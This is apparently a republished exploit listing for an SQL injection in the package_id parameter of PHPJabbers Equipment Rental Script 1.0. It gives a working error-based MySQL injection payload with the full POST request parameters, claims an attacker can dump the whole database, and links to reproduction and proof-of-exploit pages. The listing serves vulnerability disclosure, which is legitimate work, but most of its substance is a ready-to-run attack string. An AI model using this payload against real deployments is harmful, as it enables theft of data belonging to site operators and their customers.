Share
## https://sploitus.com/exploit?id=PACKETSTORM:174619
## Title: Equipment Rental Script-1.0 - SQLi  
## Author: nu11secur1ty  
## Date: 09/12/2023  
## Vendor: https://www.phpjabbers.com/  
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The package_id parameter appears to be vulnerable to SQL injection  
attacks. The payload ' was submitted in the package_id parameter, and  
a database error message was returned. You should review the contents  
of the error message, and the application's handling of other input,  
to confirm whether a vulnerability is present. The attacker can steal  
all information from the database!  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: #1* ((custom) POST)  
Type: error-based  
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)  
Payload: package_id=(-4488))) OR 1 GROUP BY  
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0  
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING  
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/09/phpjabbers-equipment-rental-script-10.html)  
  
## Time spent:  
00:25:00